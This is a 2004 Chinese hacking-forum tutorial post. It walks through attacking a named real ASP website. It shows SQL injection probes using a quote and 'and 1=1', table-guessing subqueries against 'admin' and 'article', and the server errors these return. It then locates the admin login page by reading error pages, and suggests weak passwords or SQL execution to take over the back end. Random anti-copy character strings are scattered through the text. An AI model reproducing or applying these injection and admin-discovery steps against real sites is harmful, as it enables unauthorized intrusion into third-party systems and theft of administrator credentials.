- 在线时间
- 0 小时
- 最后登录
- 2007-9-23
- 注册时间
- 2004-9-10
- 听众数
- 3
- 收听数
- 0
- 能力
- 0 分
- 体力
- 9975 点
- 威望
- 7 点
- 阅读权限
- 150
- 积分
- 4048
- 相册
- 0
- 日志
- 0
- 记录
- 0
- 帖子
- 1893
- 主题
- 823
- 精华
- 2
- 分享
- 0
- 好友
- 0
我的地盘我做主
该用户从未签到
 |
作者:枫三少 转自:黑基bbs原创作品版
& M- I2 v5 G2 b3 _6 K! `% ?& S; ~+ i' B& P( V
有很多人问过我这个问题。老是听说,看到文章里谁谁谁怎么分析别人的代码怎么来入侵的。那么怎么找代码呢?
3 R2 p) e5 i' n( v
# G* z' q/ ?- a0 I5 ?; Z分析代码,首先你得有源代码。如果找源代码呢?呵呵,假如是分析DV的,就下一个DV的来,看看他的代码。
7 d+ ^# }% j" M2 e: M i1 M/ K" j
7 z1 M! K$ ?0 W8 r在实战中往往因为时间的愿意我们采用的还有从HTML代码入手。
! T# J' _# H/ v. @) F& A
- s, p1 i( t+ J# X& p这里我简单的介绍一个过程吧。4 O8 f# I4 h3 A
( S& q0 \2 h* J首先我找到一个网站,是我们基地首页有连接的
D6 i3 {+ s9 r. H3 c, \http://www.16china.com/hack/
2 d. G) s7 w$ P9 K/ L* p' T0 D6 D, A7 W1 g# g$ o
随便选择一个分页:
) W6 s* U3 A$ H2 Q! m2 o. ~$ c2 l7 Ghttp://www.16china.com/hack/SoftView.Asp?SoftID=1393 }+ s' w; u" [2 Y: j4 I: t5 ~9 G. ]8 |
典型的ASP。看看能不能注射1 i6 q( S5 B/ F) m4 }: D W$ N
http://www.16china.com/hack/SoftView.Asp?SoftID=139'! B, t! j; l+ ~8 i) ?4 |' n
返回:' G+ v9 i0 h7 b+ K' i
Microsoft VBScript 编译器错误 错误 '800a03f6' 7 V7 F* R! O# d) C) v1 h4 |
; y) U) }$ |% I4 _; i' b缺少 'End' " }0 b8 w" O; D( v
7 J. f% {0 ~/ O, {8 \; m) `3 Y
/iisHelp/common/500-100.asp,行242 2 `% \0 ^9 H& ]5 S% R4 @, k
. K6 P% x) D4 ?5 H3 C& TMicrosoft JET Database Engine 错误 '80040e14'
& e- X9 E) @1 K7 v( @0 c0 Z3 D' ^: N
字符串的语法错误 在查询表达式 'SoftInfo.CateID=Category.CateID and SoftInfo.SubID=SubCate.SubID and SoftInfo.SoftID=139'' 中。 / u+ V7 G- n7 |) p# p- ?
9 h; ^! a' E% n( U
/hack/SoftView.Asp,行17 - Z: A" R: k5 U1 q! M
再来:
' j7 h& r1 ^% b6 J8 l1 G" chttp://www.16china.com/hack/SoftView.Asp?SoftID=139%20and%201=1
& V- W$ X ^7 U3 m. L3 y! q2 _4 \返回正常网页。
. f2 N# J i* _7 S. r
/ q* C- f4 B1 E; K0 D, z% ~提交:
9 C6 f2 L' j4 e" d0 j) z( Ihttp://www.16china.com/hack/Soft ... %20(select%20count(*)%20from%20admin)>=04 g" e, K: {$ D
$ w: `- F& z8 _' j: T& ]; `, g返回正常页/
! }3 N" O% D5 I i B/ ehttp://www.16china.com/hack/Soft ... %20(select%20count(*)%20from%20article)>=0) B/ R- M8 T9 F! q9 L B" m! v
8 N9 I9 U& i: z t5 G同样正常。
% k4 T; C; T" U
" v$ V" G7 c" ^5 r' Ehttp://www.16china.com/hack/Soft ... )%20from%20article)>=0; J A% ]4 G" F! u: D
6 S' h7 A0 P6 b; A
……
% w% E2 w# U0 @/ K' ^4 R! v6 y, g1 Z( S) C
象上面这样我们就可以成功注射网站。那么在拿到管理员帐号密码后如何找后台$ Z8 L2 j/ n4 g
按以往的经验我采用:
' ~! a; m( S' v9 \http://www.16china.com/hack/admin /*这里的”ADMIN“可以用LOGIN等替换*/
. u- B1 f4 t. t- C我为什么不用http://www.16china.com/hack/admin.asp/ E( e; D' u% `: U7 ?# B) D
http://www.16china.com/hack/admin/index.asp呢?因为我不知道他文件夹里的东西有没有被修改。如果存在ADMIN文件夹,但是并不是常用首页的话IE将返回如“你没有权限浏览网页……”等信息,一般来说我们可以确定后台就在那里。
. }2 X2 T6 E' R" ?! w- ihttp://www.16china.com/hack/admin返回信息:
- r& H7 T. `# l错误提示信息! + h7 ~6 w" A) c
产生错误的可能原因:- \' E, u; |4 H e3 k6 q) S4 C9 ^
3 @. R+ h* W) L: j9 Z! |7 x
! T8 N6 y2 Q3 Q5 Y6 F$ R您没有进入本页面的权限!本次操作已被记录!4 K7 N% y7 O, G7 z
可能您还没有登陆或者不具有使用当前功能的权限!请联系管理员.) s4 v/ z5 s% k! q
本页面为[管理员]专用,请先登陆后进入.
2 D1 Z6 s. g% @* B; B2 p
2 v$ e0 Q _# }6 A. `8 c返回上一页... /*说明登陆URL为常用的如:index.asp...*/
5 w- y; g) V# g" X7 ]4 Y查看HTML代码:
' N6 g$ J; F$ ?( [: Y<html><head><title>错误提示信息!</title>* W/ W: U1 u2 d4 q- y( G
% N1 w1 D* ?. u……
* L( A1 S/ z! i5 l/ n
0 |. p% X H/ n- e<a href=adminlogin.asp class=meun target=_top>登陆</a>后进入.7 Z) i6 v# B4 r7 K3 G5 C2 i: z
……5 |" K, E- }, y7 |9 w6 O b! x
) I# K" ^- W& Q& J) k
找到了:
; m# {0 t& M" Fhttp://www.16china.com/hack/admin/adminlogin.asp6 d; |: F: Z/ }1 q! c* v+ Q, r
+ M& A! z% X! U" b) l, i
/ ~( p5 O3 ?: O2 U9 a看看他的源代码告诉我们些什么:. T- Y5 X$ r; o! g8 J
, {/ w+ b6 E9 G<html>
- h8 N) a. D# @) z1 N
( `6 z2 {: n, X2 W1 t+ l! V<head>
+ E4 g6 e* @( x; j2 f2 _) h<title>管理员登陆</title>
% a ]0 w4 ?1 R5 y& |: C% V0 q! T# p
( A, z: s( M* \' @3 V. l! F* q……………" E+ A: o) _' ~5 W: y+ ?
! I9 N. v# l" w' f' t/ J8 b' m关于数据库表名这些这里不多讲,看看,如果我们输入正确的帐号密码将回进入$ m0 V6 z1 ]% e V
http://www.16china.com/hack/admin/adminlogin.asp?action=login
) O) `3 B0 a( G" d, v4 g0 r; z这里。
" Q! A' C# C0 u4 S
3 w. @" n6 t; \只要知道了后台,我们就有很多办法,如弱口令,SQL本地执行(赢政下载系统)……
) Q4 n! l! R- J! I/ |
I" Z* f% {* Z% E$ R) E% |懂了吗?好了,时间关系加上本人技术原因就写到这里吧。不懂的可以跟贴,大家一起讨论一下:) |
zan
|
IP卡
狗仔卡
发表于 2004-10-4 00:36
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
